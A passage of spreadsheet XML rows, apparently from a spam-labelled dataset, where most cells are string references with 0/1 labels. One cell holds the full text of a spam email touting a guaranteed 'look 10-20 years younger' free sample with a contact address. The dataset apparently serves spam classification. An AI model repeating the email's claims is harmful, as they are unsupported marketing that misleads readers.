      </c>
    </row>
    <row r="6225">
      <c r="A6225" s="1">
        <v>6223.0</v>
      </c>
      <c r="B6225" s="1" t="s">
        <v>8257</v>
      </c>
      <c r="C6225" s="3" t="str">
        <f>============================================================================================
 THIS IS A FREE OFFER! 	THIS IS A FREE OFFER! 	THIS IS A FREE OFFER! 	THIS IS A FREE OFFER! 
 =============================================================================================
 Did you know that one of the biggest concerns of hundreds of millions of people is to maintain a youthful appearance?
 If you are interested in receiving a FREE SAMPLE of an amazing product that is guaranteed to 
 deliver quick and dramatic results for people interested in looking 10-20 years younger, then please take advantage of our free offer.
 We so much believe in our product that we are willing to invest in the costs of letting you try them absolutely risk FREE!
 The reason for this is simple!  We know after years of testing our product, that you will 
 be so amazed with the quick and dramatic results that you not only will order more, but you 
 will share your results with others, thus making our investment in you very worth while.
 If you would like a FREE SAMPLE and also learn how you could try this product absolutely RISK FREE, then simply send a blank email with the words "SUBSCRIBE FOR FREE SAMPLE" in the subject area to:
 freesample1818@yahoo.com
 Your request will be processed with in 24 hours and you will be sent the requested 
 information.
 Thank you for your interest,
 The "Look Younger Now" Associates
 ONCE AGAIN:
 =============================================================================================
 THIS IS A FREE OFFER! 	THIS IS A FREE OFFER! 	THIS IS A FREE OFFER! 	THIS IS A FREE OFFER!
 =============================================================================================
</f>
        <v>#ERROR!</v>
      </c>
      <c r="D6225" s="1">
        <v>1.0</v>
      </c>
    </row>
    <row r="6226" hidden="1">
      <c r="A6226" s="1">
        <v>6224.0</v>
      </c>
      <c r="B6226" s="1" t="s">
        <v>814</v>
      </c>
      <c r="C6226" s="1" t="s">
        <v>8258</v>
      </c>
      <c r="D6226" s="1">
        <v>0.0</v>
      </c>
    </row>
    <row r="6227" hidden="1">
      <c r="A6227" s="1">
        <v>6225.0</v>
      </c>
      <c r="B6227" s="1" t="s">
        <v>8259</v>
      </c>
      <c r="C6227" s="1" t="s">
        <v>8260</v>
      </c>
      <c r="D6227" s="1">
        <v>0.0</v>
      </c>
    </row>
    <row r="6228" hidden="1">
      <c r="A6228" s="1">
        <v>6226.0</v>
      </c>
      <c r="B6228" s="1" t="s">
        <v>8261</v>
      </c>
      <c r="C6228" s="1" t="s">
        <v>8262</v>
      </c>
      <c r="D6228" s="1">
        <v>0.0</v>
      </c>
    </row>
    <row r="6229" hidden="1">
      <c r="A6229" s="1">
        <v>6227.0</v>
      </c>
      <c r="B6229" s="1" t="s">
        <v>7099</v>
      </c>
      <c r="C6229" s="1" t="s">
        <v>7100</v>
      </c>
      <c r="D6229" s="1">
        <v>0.0</v>
      </c>
    </row>
    <row r="6230">
      <c r="A6230" s="1">
        <v>6228.0</v>
      </c>
      <c r="B6230" s="1" t="s">
        <v>1591</v>
      </c>
      <c r="C6230" s="1" t="s">
        <v>8263</v>
      </c>
      <c r="D6230" s="1">
        <v>1.0</v>
      </c>
    </row>
    <row r="6231" hidden="1">
      <c r="A6231" s="1">
        <v>6229.0</v>
      </c>
      <c r="B6231" s="1" t="s">
        <v>902</v>
      </c>
      <c r="C6231" s="1" t="s">
        <v>903</v>
      </c>
      <c r="D6231" s="1">
        <v>0.0</v>
      </c>
    </row>
    <row r="6232" hidden="1">
      <c r="A6232" s="1">
        <v>6230.0</v>
      </c>
      <c r="B6232" s="1" t="s">
        <v>792</v>
      </c>
      <c r="C6232" s="1" t="s">
        <v>793</v>
      </c>
      <c r="D6232" s="1">
        <v>0.0</v>
      </c>
    </row>
    <row r="6233">
      <c r="A6233" s="1">
        <v>6231.0</v>
      </c>
      <c r="B6233" s="1" t="s">
        <v>8264</v>
      </c>
      <c r="C6233" s="1" t="s">
        <v>741</v>
      </c>
      <c r="D6233" s="1">
        <v>1.0</v>
      </c>
    </row>
    <row r="6234">
      <c r="A6234" s="1">
        <v>6232.0</v>
      </c>
      <c r="B6234" s="1" t="s">
        <v>8265</v>
      </c>
      <c r="C6234" s="1" t="s">
        <v>8266</v>
      </c>
      <c r="D6234" s="1">
        <v>1.0</v>
      </c>
    </row>
    <row r="6235">
      <c r="A6235" s="1">
        <v>6233.0</v>
      </c>
      <c r="B6235" s="1" t="s">
        <v>738</v>
      </c>
      <c r="C6235" s="1" t="s">
        <v>739</v>
      </c>
      <c r="D6235" s="1">
        <v>1.0</v>
      </c>
    </row>
    <row r="6236" hidden="1">
      <c r="A6236" s="1">
        <v>6234.0</v>
      </c>
      <c r="B6236" s="1" t="s">
        <v>2548</v>
      </c>
      <c r="C6236" s="1" t="s">
        <v>3820</v>
      </c>
      <c r="D6236" s="1">
        <v>0.0</v>
      </c>
    </row>
    <row r="6237" hidden="1">
      <c r="A6237" s="1">
        <v>6235.0</v>
      </c>
      <c r="B6237" s="1" t="s">
        <v>7505</v>
      </c>
      <c r="C6237" s="1" t="s">
        <v>7506</v>
      </c>
      <c r="D6237" s="1">
        <v>0.0</v>
      </c>
    </row>
    <row r="6238">
      <c r="A6238" s="1">
        <v>6236.0</v>
      </c>
      <c r="B6238" s="1" t="s">
        <v>8267</v>
      </c>
      <c r="C6238" s="1" t="s">
        <v>8268</v>
      </c>
      <c r="D6238" s="1">
        <v>1.0</v>
      </c>
    </row>
    <row r="6239" hidden="1">
      <c r="A6239" s="1">
        <v>6237.0</v>
      </c>
      <c r="B6239" s="1" t="s">
        <v>4193</v>
      </c>
      <c r="C6239" s="1" t="s">
        <v>4194</v>
      </c>
      <c r="D6239" s="1">
        <v>0.0</v>
      </c>
    </row>
    <row r="6240">
      <c r="A6240" s="1">
        <v>6238.0</v>
      </c>
      <c r="B6240" s="1" t="s">
        <v>8269</v>
      </c>
      <c r="C6240" s="1" t="s">
        <v>8270</v>
      </c>
      <c r="D6240" s="1">
        <v>1.0</v>
      </c>
    </row>
    <row r="6241" hidden="1">
      <c r="A6241" s="1">
        <v>6239.0</v>
      </c>
      <c r="B6241" s="1" t="s">
        <v>7879</v>
      </c>
      <c r="C6241" s="1" t="s">
        <v>7880</v>
      </c>
      <c r="D6241" s="1">
        <v>0.0</v>
      </c>
    </row>
    <row r="6242" hidden="1">
      <c r="A6242" s="1">
        <v>6240.0</v>
      </c>
      <c r="B6242" s="1" t="s">
        <v>8271</v>
      </c>
      <c r="C6242" s="1" t="s">
        <v>8272</v>
      </c>
      <c r="D6242" s="1">
        <v>0.0</v>
      </c>
    </row>
    <row r="6243" hidden="1">
      <c r="A6243" s="1">
        <v>6241.0</v>
      </c>
      <c r="B6243" s="1" t="s">
        <v>827</v>
      </c>
      <c r="C6243" s="1" t="s">
        <v>2114</v>
      </c>
      <c r="D6243" s="1">
        <v>0.0</v>
      </c>
    </row>
    <row r="6244" hidden="1">
      <c r="A6244" s="1">
        <v>6242.0</v>
      </c>
      <c r="B6244" s="1" t="s">
        <v>655</v>
      </c>
      <c r="C6244" s="1" t="s">
        <v>8273</v>
      </c>
      <c r="D6244" s="1">
        <v>0.0</v>
      </c>
    </row>
    <row r="6245" hidden="1">
      <c r="A6245" s="1">
        <v>6243.0</v>
      </c>
      <c r="B6245" s="1" t="s">
        <v>7276</v>
      </c>
      <c r="C6245" s="1" t="s">
        <v>7277</v>
      </c>
      <c r="D6245" s="1">
        <v>0.0</v>
      </c>
    </row>
    <row r="6246" hidden="1">
      <c r="A6246" s="1">
        <v>6244.0</v>
      </c>
      <c r="B6246" s="1" t="s">
        <v>8274</v>
      </c>
      <c r="C6246" s="1" t="s">
        <v>8275</v>
      </c>
      <c r="D6246" s="1">
        <v>0.0</v>
      </c>
    </row>
    <row r="6247" hidden="1">
      <c r="A6247" s="1">
        <v>6245.0</v>
      </c>
      <c r="B6247" s="1" t="s">
        <v>8276</v>
      </c>
      <c r="C6247" s="1" t="s">
        <v>8277</v>
      </c>
      <c r="D6247" s="1">
        <v>0.0</v>
      </c>
    </row>
    <row r="6248" hidden="1">
      <c r="A6248" s="1">
        <v>6246.0</v>
      </c>
      <c r="B6248" s="1" t="s">
        <v>5297</v>
      </c>
      <c r="C6248" s="1" t="s">
        <v>5298</v>
      </c>
      <c r="D6248" s="1">
        <v>0.0</v>
      </c>
    </row>
    <row r="6249">
      <c r="A6249" s="1">
        <v>6247.0</v>
      </c>
      <c r="B6249" s="1" t="s">
        <v>6631</v>
      </c>
      <c r="C6249" s="1" t="s">
        <v>6632</v>
      </c>
      <c r="D6249" s="1">
        <v>1.0</v>
      </c>
    </row>
    <row r="6250" hidden="1">
      <c r="A6250" s="1">
        <v>6248.0</v>
      </c>
      <c r="B6250" s="1" t="s">
        <v>4695</v>
      </c>
      <c r="C6250" s="1" t="s">
        <v>4696</v>
      </c>
      <c r="D6250" s="1">
        <v>0.0</v>
      </c>
    </row>
    <row r="6251">
      <c r="A6251" s="1">
        <v>6249.0</v>
      </c>
      <c r="B6251" s="1" t="s">
        <v>740</v>
      </c>
      <c r="C6251" s="1" t="s">
        <v>741</v>
      </c>
      <c r="D6251" s="1">
        <v>1.0</v>
      </c>
    </row>
    <row r="6252" hidden="1">
      <c r="A6252" s="1">
        <v>6250.0</v>
      </c>
      <c r="B6252" s="1" t="s">
        <v>914</v>
      </c>
      <c r="C6252" s="1" t="s">
        <v>4862</v>
      </c>
      <c r="D6252" s="1">
        <v>0.0</v>
      </c>
    </row>
    <row r="6253">
      <c r="A6253" s="1">
        <v>6251.0</v>
      </c>
      <c r="B6253" s="1" t="s">
        <v>8216</v>
      </c>
      <c r="C6253" s="1" t="s">
        <v>8217</v>
      </c>
      <c r="D6253" s="1">
        <v>1.0</v>
      </c>
    </row>
    <row r="6254" hidden="1">
      <c r="A6254" s="1">
        <v>6252.0</v>
      </c>
      <c r="B6254" s="1" t="s">
        <v>4720</v>
      </c>
      <c r="C6254" s="1" t="s">
        <v>4721</v>
      </c>
      <c r="D6254" s="1">
        <v>0.0</v>
      </c>
    </row>
    <row r="6255" hidden="1">
      <c r="A6255" s="1">
        <v>6253.0</v>
      </c>
      <c r="B6255" s="1" t="s">
        <v>2323</v>
      </c>
      <c r="C6255" s="1" t="s">
        <v>8278</v>
      </c>
      <c r="D6255" s="1">
        <v>0.0</v>
      </c>
    </row>
    <row r="6256" hidden="1">
      <c r="A6256" s="1">
        <v>6254.0</v>
      </c>
      <c r="B6256" s="1" t="s">
        <v>5493</v>
      </c>
      <c r="C6256" s="1" t="s">
        <v>5494</v>
      </c>
      <c r="D6256" s="1">
        <v>0.0</v>
      </c>
    </row>
    <row r="6257">
      <c r="A6257" s="1">
        <v>6255.0</v>
      </c>
      <c r="B6257" s="1" t="s">
        <v>7972</v>
      </c>
      <c r="C6257" s="1" t="s">
        <v>7973</v>
      </c>
      <c r="D6257" s="1">
        <v>1.0</v>
      </c>
    </row>
    <row r="6258" hidden="1">
      <c r="A6258" s="1">
        <v>6256.0</v>
      </c>
      <c r="B6258" s="1" t="s">
        <v>2459</v>
      </c>
      <c r="C6258" s="1" t="s">
        <v>8279</v>
      </c>
      <c r="D6258" s="1">
        <v>0.0</v>
      </c>
    </row>
    <row r="6259">
      <c r="A6259" s="1">
        <v>6257.0</v>
      </c>
      <c r="B6259" s="1" t="s">
        <v>8280</v>
      </c>
      <c r="C6259" s="1" t="s">
        <v>8281</v>
      </c>
      <c r="D6259" s="1">
        <v>1.0</v>
      </c>
    </row>
    <row r="6260" hidden="1">
      <c r="A6260" s="1">
        <v>6258.0</v>
      </c>
      <c r="B6260" s="1" t="s">
        <v>7753</v>
      </c>
      <c r="C6260" s="1" t="s">
        <v>7754</v>
      </c>
      <c r="D6260" s="1">
        <v>0.0</v>
      </c>
    </row>
    <row r="6261">
      <c r="A6261" s="1">
        <v>6259.0</v>
      </c>
      <c r="B6261" s="1" t="s">
        <v>8282</v>
      </c>
      <c r="C6261" s="1" t="s">
        <v>8283</v>
      </c>
      <c r="D6261" s="1">
        <v>1.0</v>
      </c>
    </row>
    <row r="6262" hidden="1">
      <c r="A6262" s="1">
        <v>6260.0</v>
      </c>
      <c r="B6262" s="1" t="s">
        <v>8284</v>
      </c>
      <c r="C6262" s="1" t="s">
        <v>8285</v>
      </c>
      <c r="D6262" s="1">
        <v>0.0</v>
      </c>
    </row>
    <row r="6263" hidden="1">
      <c r="A6263" s="1">
        <v>6261.0</v>
      </c>
      <c r="B6263" s="1" t="s">
        <v>5643</v>
      </c>
      <c r="C6263" s="1" t="s">
        <v>5644</v>
      </c>
      <c r="D6263" s="1">
        <v>0.0</v>
      </c>
    </row>
    <row r="6264" hidden="1">
      <c r="A6264" s="1">
        <v>6262.0</v>
      </c>
      <c r="B6264" s="1" t="s">
        <v>3586</v>
      </c>
      <c r="C6264" s="1" t="s">
        <v>3587</v>
      </c>
      <c r="D6264" s="1">
        <v>0.0</v>
      </c>
    </row>
    <row r="6265" hidden="1">
      <c r="A6265" s="1">
        <v>6263.0</v>
      </c>
      <c r="B6265" s="1" t="s">
        <v>4120</v>
      </c>
      <c r="C6265" s="1" t="s">
        <v>8286</v>
      </c>
      <c r="D6265" s="1">
        <v>0.0</v>
      </c>
    </row>
    <row r="6266" hidden="1">
      <c r="A6266" s="1">
        <v>6264.0</v>
      </c>
      <c r="B6266" s="1" t="s">
        <v>2756</v>
      </c>
      <c r="C6266" s="1" t="s">
        <v>2757</v>
      </c>
      <c r="D6266" s="1">
        <v>0.0</v>
      </c>
    </row>
    <row r="6267">
      <c r="A6267" s="1">
        <v>6265.0</v>
      </c>
      <c r="B6267" s="1" t="s">
        <v>8287</v>
      </c>
      <c r="C6267" s="1" t="s">
        <v>8288</v>
      </c>
      <c r="D6267" s="1">
        <v>1.0</v>
      </c>
    </row>
    <row r="6268" hidden="1">
      <c r="A6268" s="1">
        <v>6266.0</v>
      </c>
      <c r="B6268" s="1" t="s">
        <v>852</v>
      </c>
      <c r="C6268" s="1" t="s">
        <v>853</v>
      </c>
      <c r="D6268" s="1">
        <v>0.0</v>
      </c>
    </row>
    <row r="6269" hidden="1">
      <c r="A6269" s="1">
        <v>6267.0</v>
      </c>
      <c r="B6269" s="1" t="s">
        <v>8289</v>
      </c>
      <c r="C6269" s="1" t="s">
        <v>8290</v>
      </c>
      <c r="D6269" s="1">
        <v>0.0</v>
      </c>
    </row>
    <row r="6270" hidden="1">
      <c r="A6270" s="1">
        <v>6268.0</v>
      </c>
      <c r="B6270" s="1" t="s">
        <v>7747</v>
      </c>
      <c r="C6270" s="1" t="s">
        <v>7748</v>
      </c>
      <c r="D6270" s="1">
        <v>0.0</v>
      </c>
    </row>
    <row r="6271" hidden="1">
      <c r="A6271" s="1">
        <v>6269.0</v>
      </c>
      <c r="B6271" s="1" t="s">
        <v>347</v>
      </c>
      <c r="C6271" s="1" t="s">
        <v>6685</v>
      </c>
      <c r="D6271" s="1">
        <v>0.0</v>
      </c>
    </row>
    <row r="6272" hidden="1">
      <c r="A6272" s="1">
        <v>6270.0</v>
      </c>
      <c r="B6272" s="1" t="s">
        <v>1510</v>
      </c>
      <c r="C6272" s="1" t="s">
        <v>1511</v>
      </c>
      <c r="D6272" s="1">
        <v>0.0</v>
      </c>
    </row>
    <row r="6273" hidden="1">
      <c r="A6273" s="1">
        <v>6271.0</v>
      </c>
      <c r="B6273" s="1" t="s">
        <v>8291</v>
      </c>
      <c r="C6273" s="1" t="s">
        <v>8292</v>
      </c>
      <c r="D6273" s="1">
        <v>0.0</v>
      </c>
    </row>
    <row r="6274" hidden="1">
      <c r="A6274" s="1">
        <v>6272.0</v>
      </c>
      <c r="B6274" s="1" t="s">
        <v>889</v>
      </c>
      <c r="C6274" s="1" t="s">
        <v>8293</v>
      </c>
      <c r="D6274" s="1">
        <v>0.0</v>
      </c>
    </row>
    <row r="6275" hidden="1">
      <c r="A6275" s="1">
        <v>6273.0</v>
      </c>
      <c r="B6275" s="1" t="s">
        <v>218</v>
      </c>
      <c r="C6275" s="1" t="s">
        <v>219</v>
      </c>
      <c r="D6275" s="1">
        <v>0.0</v>
      </c>
    </row>
    <row r="6276" hidden="1">
      <c r="A6276" s="1">
        <v>6274.0</v>
      </c>
      <c r="B6276" s="1" t="s">
        <v>4457</v>
      </c>
      <c r="C6276" s="1" t="s">
        <v>8294</v>
      </c>
      <c r="D6276" s="1">
        <v>0.0</v>
      </c>
    </row>
    <row r="6277" hidden="1">
      <c r="A6277" s="1">
        <v>6275.0</v>
      </c>
      <c r="B6277" s="1" t="s">
        <v>1931</v>
      </c>
      <c r="C6277" s="1" t="s">
        <v>8295</v>
      </c>
      <c r="D6277" s="1">
        <v>0.0</v>
      </c>
    </row>
    <row r="6278" hidden="1">
      <c r="A6278" s="1">
        <v>6276.0</v>
      </c>
      <c r="B6278" s="1" t="s">
        <v>7611</v>
      </c>
      <c r="C6278" s="1" t="s">
        <v>7612</v>
      </c>
      <c r="D6278" s="1">
        <v>0.0</v>
      </c>
    </row>
    <row r="6279" hidden="1">
      <c r="A6279" s="1">
        <v>6277.0</v>
      </c>
      <c r="B6279" s="1" t="s">
        <v>1906</v>
      </c>
      <c r="C6279" s="1" t="s">
        <v>1907</v>
      </c>
      <c r="D6279" s="1">
        <v>0.0</v>
      </c>
    </row>
    <row r="6280" hidden="1">
      <c r="A6280" s="1">
        <v>6278.0</v>
      </c>
      <c r="B6280" s="1" t="s">
        <v>8296</v>
      </c>
      <c r="C6280" s="1" t="s">
        <v>8297</v>
      </c>
      <c r="D6280" s="1">
        <v>0.0</v>
      </c>
    </row>
    <row r="6281" hidden="1">
      <c r="A6281" s="1">
        <v>6279.0</v>
      </c>
      <c r="B6281" s="1" t="s">
        <v>284</v>
      </c>
      <c r="C6281" s="1" t="s">
        <v>285</v>
      </c>
      <c r="D6281" s="1">
        <v>0.0</v>
      </c>
    </row>
    <row r="6282" hidden="1">
      <c r="A6282" s="1">
        <v>6280.0</v>
      </c>
      <c r="B6282" s="1" t="s">
        <v>30</v>
      </c>
      <c r="C6282" s="1" t="s">
        <v>8298</v>
      </c>
      <c r="D6282" s="1">
        <v>0.0</v>
      </c>
    </row>
    <row r="6283" hidden="1">
      <c r="A6283" s="1">
        <v>6281.0</v>
      </c>
      <c r="B6283" s="1" t="s">
        <v>4319</v>
      </c>
      <c r="C6283" s="1" t="s">
        <v>4320</v>
      </c>
      <c r="D6283" s="1">
        <v>0.0</v>
      </c>
    </row>
    <row r="6284" hidden="1">
      <c r="A6284" s="1">
        <v>6282.0</v>
      </c>
      <c r="B6284" s="1" t="s">
        <v>8299</v>
      </c>
      <c r="C6284" s="1" t="s">
        <v>8300</v>
      </c>
      <c r="D6284" s="1">
        <v>0.0</v>
      </c>
    </row>
    <row r="6285" hidden="1">
      <c r="A6285" s="1">
        <v>6283.0</v>
      </c>
      <c r="B6285" s="1" t="s">
        <v>26</v>
      </c>
      <c r="C6285" s="1" t="s">
        <v>7749</v>
      </c>
      <c r="D6285" s="1">
        <v>0.0</v>
      </c>
    </row>
    <row r="6286">
      <c r="A6286" s="1">
        <v>6284.0</v>
      </c>
      <c r="B6286" s="1" t="s">
        <v>8301</v>
      </c>
      <c r="C6286" s="1" t="s">
        <v>8302</v>
      </c>
      <c r="D6286" s="1">
        <v>1.0</v>
      </c>
    </row>
    <row r="6287">
      <c r="A6287" s="1">
        <v>6285.0</v>
      </c>
      <c r="B6287" s="1" t="s">
        <v>3910</v>
      </c>
      <c r="C6287" s="3" t="str">
        <v>#ERROR!</v>
      </c>
      <c r="D6287" s="1">
        <v>1.0</v>
      </c>
    </row>
    <row r="6288" hidden="1">
      <c r="A6288" s="1">
        <v>6286.0</v>
      </c>
      <c r="B6288" s="1" t="s">
        <v>4436</v>
      </c>
      <c r="C6288" s="1" t="s">
        <v>5234</v>
      </c>
      <c r="D6288" s="1">
        <v>0.0</v>
      </c>
    </row>
    <row r="6289">
      <c r="A6289" s="1">
        <v>6287.0</v>
      </c>
      <c r="B6289" s="1" t="s">
        <v>8303</v>
      </c>
      <c r="C6289" s="1" t="s">
        <v>8304</v>
      </c>
      <c r="D6289" s="1">
        <v>1.0</v>
      </c>
    </row>
    <row r="6290">
      <c r="A6290" s="1">
        <v>6288.0</v>
      </c>
      <c r="B6290" s="1" t="s">
        <v>8305</v>
      </c>
      <c r="C6290" s="1" t="s">
        <v>8306</v>
      </c>
      <c r="D6290" s="1">
        <v>1.0</v>
      </c>
    </row>
    <row r="6291" hidden="1">
      <c r="A6291" s="1">
        <v>6289.0</v>
      </c>
      <c r="B6291" s="1" t="s">
        <v>663</v>
      </c>
      <c r="C6291" s="1" t="s">
        <v>813</v>
      </c>
      <c r="D6291" s="1">
        <v>0.0</v>
      </c>
    </row>
    <row r="6292" hidden="1">
      <c r="A6292" s="1">
        <v>6290.0</v>
      </c>
      <c r="B6292" s="1" t="s">
        <v>56</v>
      </c>
      <c r="C6292" s="1" t="s">
        <v>5763</v>
      </c>
      <c r="D6292" s="1">
        <v>0.0</v>
      </c>
    </row>
    <row r="6293" hidden="1">
      <c r="A6293" s="1">
        <v>6291.0</v>
      </c>
      <c r="B6293" s="1" t="s">
        <v>1516</v>
      </c>
      <c r="C6293" s="1" t="s">
        <v>8307</v>
      </c>
      <c r="D6293" s="1">
        <v>0.0</v>
      </c>
    </row>
    <row r="6294" hidden="1">
      <c r="A6294" s="1">
        <v>6292.0</v>
      </c>
      <c r="B6294" s="1" t="s">
        <v>2238</v>
      </c>
      <c r="C6294" s="1" t="s">
        <v>8308</v>
      </c>
      <c r="D6294" s="1">
        <v>0.0</v>
      </c>
    </row>
    <row r="6295" hidden="1">
      <c r="A6295" s="1">
        <v>6293.0</v>
      </c>
      <c r="B6295" s="1" t="s">
        <v>8309</v>
      </c>
      <c r="C6295" s="1" t="s">
        <v>8310</v>
      </c>
      <c r="D6295" s="1">
        <v>0.0</v>
      </c>
    </row>
    <row r="6296" hidden="1">
      <c r="A6296" s="1">
        <v>6294.0</v>
      </c>
      <c r="B6296" s="1" t="s">
        <v>605</v>
      </c>
      <c r="C6296" s="1" t="s">
        <v>8311</v>
      </c>
      <c r="D6296" s="1">
        <v>0.0</v>
      </c>
    </row>
    <row r="6297" hidden="1">
      <c r="A6297" s="1">
        <v>6295.0</v>
      </c>
      <c r="B6297" s="1" t="s">
        <v>6890</v>
      </c>
      <c r="C6297" s="1" t="s">
        <v>8312</v>
      </c>
      <c r="D6297" s="1">
        <v>0.0</v>
      </c>
    </row>
    <row r="6298" hidden="1">
      <c r="A6298" s="1">
        <v>6296.0</v>
      </c>
      <c r="B6298" s="1" t="s">
        <v>747</v>
      </c>
      <c r="C6298" s="1" t="s">
        <v>8313</v>
      </c>
      <c r="D6298" s="1">
        <v>0.0</v>
      </c>
    </row>
    <row r="6299" hidden="1">
      <c r="A6299" s="1">
        <v>6297.0</v>
      </c>
      <c r="B6299" s="1" t="s">
        <v>4052</v>
      </c>
      <c r="C6299" s="1" t="s">
        <v>4053</v>
      </c>
      <c r="D6299" s="1">
        <v>0.0</v>
      </c>
    </row>
    <row r="6300" hidden="1">
      <c r="A6300" s="1">
        <v>6298.0</v>
      </c>
      <c r="B6300" s="1" t="s">
        <v>7924</v>
      </c>
      <c r="C6300" s="1" t="s">
        <v>8314</v>
      </c>
      <c r="D6300" s="1">
        <v>0.0</v>
      </c>
    </row>
    <row r="6301" hidden="1">
      <c r="A6301" s="1">
        <v>6299.0</v>
      </c>
      <c r="B6301" s="1" t="s">
        <v>605</v>
      </c>
      <c r="C6301" s="1" t="s">
        <v>8311</v>
      </c>
      <c r="D6301" s="1">
        <v>0.0</v>
      </c>
    </row>
    <row r="6302" hidden="1">
      <c r="A6302" s="1">
        <v>6300.0</v>
      </c>
      <c r="B6302" s="1" t="s">
        <v>5936</v>
      </c>
      <c r="C6302" s="1" t="s">
        <v>5937</v>
      </c>
      <c r="D6302" s="1">
        <v>0.0</v>
      </c>
    </row>
    <row r="6303" hidden="1">
      <c r="A6303" s="1">
        <v>6301.0</v>
      </c>
      <c r="B6303" s="1" t="s">
        <v>1027</v>
      </c>
      <c r="C6303" s="1" t="s">
        <v>5232</v>
      </c>
      <c r="D6303" s="1">
        <v>0.0</v>
      </c>
    </row>
    <row r="6304" hidden="1">
      <c r="A6304" s="1">
        <v>6302.0</v>
      </c>
      <c r="B6304" s="1" t="s">
        <v>5666</v>
      </c>
      <c r="C6304" s="1" t="s">
        <v>5667</v>
      </c>
      <c r="D6304" s="1">
        <v>0.0</v>
      </c>
    </row>
    <row r="6305" hidden="1">
      <c r="A6305" s="1">
        <v>6303.0</v>
      </c>
      <c r="B6305" s="1" t="s">
        <v>6766</v>
      </c>
      <c r="C6305" s="1" t="s">
        <v>6767</v>
      </c>
      <c r="D6305" s="1">
        <v>0.0</v>
      </c>
    </row>
    <row r="6306" hidden="1">
      <c r="A6306" s="1">
        <v>6304.0</v>
      </c>
      <c r="B6306" s="1" t="s">
        <v>6652</v>
      </c>
      <c r="C6306" s="1" t="s">
        <v>6653</v>
      </c>
      <c r="D6306" s="1">
        <v>0.0</v>
      </c>
    </row>
    <row r="6307">
      <c r="A6307" s="1">
        <v>6305.0</v>
      </c>
      <c r="B6307" s="1" t="s">
        <v>5062</v>
      </c>
      <c r="C6307" s="1" t="s">
        <v>5063</v>
      </c>
      <c r="D6307" s="1">
        <v>1.0</v>
      </c>
    </row>
    <row r="6308" hidden="1">
      <c r="A6308" s="1">
        <v>6306.0</v>
      </c>
      <c r="B6308" s="1" t="s">
        <v>8315</v>
      </c>
      <c r="C6308" s="1" t="s">
        <v>8316</v>
      </c>
      <c r="D6308" s="1">
        <v>0.0</v>
      </c>
    </row>
    <row r="6309" hidden="1">
      <c r="A6309" s="1">
        <v>6307.0</v>
      </c>
      <c r="B6309" s="1" t="s">
        <v>1677</v>
      </c>
      <c r="C6309" s="1" t="s">
        <v>1678</v>
      </c>
      <c r="D6309" s="1">
        <v>0.0</v>
      </c>
    </row>
    <row r="6310" hidden="1">
      <c r="A6310" s="1">
        <v>6308.0</v>
      </c>
      <c r="B6310" s="1" t="s">
        <v>64</v>
      </c>
      <c r="C6310" s="1" t="s">
        <v>966</v>
      </c>
      <c r="D6310" s="1">
        <v>0.0</v>
      </c>
    </row>
    <row r="6311">
      <c r="A6311" s="1">
        <v>6309.0</v>
      </c>
      <c r="B6311" s="1" t="s">
        <v>8317</v>
      </c>
      <c r="C6311" s="1" t="s">
        <v>8318</v>
      </c>
      <c r="D6311" s="1">
        <v>1.0</v>
      </c>
    </row>
    <row r="6312" hidden="1">
      <c r="A6312" s="1">
        <v>6310.0</v>
      </c>
      <c r="B6312" s="1" t="s">
        <v>1536</v>
      </c>
      <c r="C6312" s="1" t="s">
        <v>3397</v>
      </c>
      <c r="D6312" s="1">
        <v>0.0</v>
      </c>
    </row>
    <row r="6313" hidden="1">
      <c r="A6313" s="1">
        <v>6311.0</v>
      </c>
      <c r="B6313" s="1" t="s">
        <v>6322</v>
      </c>
      <c r="C6313" s="1" t="s">
        <v>6323</v>
      </c>
      <c r="D6313" s="1">
        <v>0.0</v>
      </c>
    </row>
    <row r="6314" hidden="1">
      <c r="A6314" s="1">
        <v>6312.0</v>
      </c>
      <c r="B6314" s="1" t="s">
        <v>8291</v>
      </c>
      <c r="C6314" s="1" t="s">
        <v>8292</v>
      </c>
      <c r="D6314" s="1">
        <v>0.0</v>
      </c>
    </row>
    <row r="6315" hidden="1">
      <c r="A6315" s="1">
        <v>6313.0</v>
      </c>
      <c r="B6315" s="1" t="s">
        <v>1254</v>
      </c>
      <c r="C6315" s="1" t="s">
        <v>1255</v>
      </c>
      <c r="D6315" s="1">
        <v>0.0</v>
      </c>
    </row>
    <row r="6316" hidden="1">
      <c r="A6316" s="1">
        <v>6314.0</v>
      </c>
      <c r="B6316" s="1" t="s">
        <v>8319</v>
      </c>
      <c r="C6316" s="1" t="s">
        <v>8320</v>
      </c>
      <c r="D6316" s="1">
        <v>0.0</v>
      </c>
    </row>
    <row r="6317" hidden="1">
      <c r="A6317" s="1">
        <v>6315.0</v>
      </c>
      <c r="B6317" s="1" t="s">
        <v>3528</v>
      </c>
      <c r="C6317" s="1" t="s">
        <v>3529</v>
      </c>
      <c r="D6317" s="1">
        <v>0.0</v>
      </c>
    </row>
    <row r="6318">
      <c r="A6318" s="1">
        <v>6316.0</v>
      </c>
      <c r="B6318" s="1" t="s">
        <v>4715</v>
      </c>
      <c r="C6318" s="1" t="s">
        <v>4716</v>
      </c>
      <c r="D6318" s="1">
        <v>1.0</v>
      </c>
    </row>
    <row r="6319" hidden="1">
      <c r="A6319" s="1">
        <v>6317.0</v>
      </c>
      <c r="B6319" s="1" t="s">
        <v>3050</v>
      </c>
      <c r="C6319" s="1" t="s">
        <v>5260</v>
      </c>
      <c r="D6319" s="1">
        <v>0.0</v>
      </c>
    </row>
    <row r="6320" hidden="1">
      <c r="A6320" s="1">
        <v>6318.0</v>
      </c>
      <c r="B6320" s="1" t="s">
        <v>194</v>
      </c>
      <c r="C6320" s="1" t="s">
        <v>195</v>
      </c>
      <c r="D6320" s="1">
        <v>0.0</v>
      </c>
    </row>
    <row r="6321">
      <c r="A6321" s="1">
        <v>6319.0</v>
      </c>
      <c r="B6321" s="1" t="s">
        <v>8321</v>
      </c>
      <c r="C6321" s="1" t="s">
        <v>8322</v>
      </c>
      <c r="D6321" s="1">
        <v>1.0</v>
      </c>
    </row>
    <row r="6322" hidden="1">
      <c r="A6322" s="1">
        <v>6320.0</v>
      </c>
      <c r="B6322" s="1" t="s">
        <v>323</v>
      </c>
      <c r="C6322" s="1" t="s">
        <v>8323</v>
      </c>
      <c r="D6322" s="1">
        <v>0.0</v>
      </c>
    </row>
    <row r="6323" hidden="1">
      <c r="A6323" s="1">
        <v>6321.0</v>
      </c>
      <c r="B6323" s="1" t="s">
        <v>949</v>
      </c>
      <c r="C6323" s="1" t="s">
        <v>8324</v>
      </c>
      <c r="D6323" s="1">
        <v>0.0</v>
      </c>
    </row>
    <row r="6324" hidden="1">
      <c r="A6324" s="1">
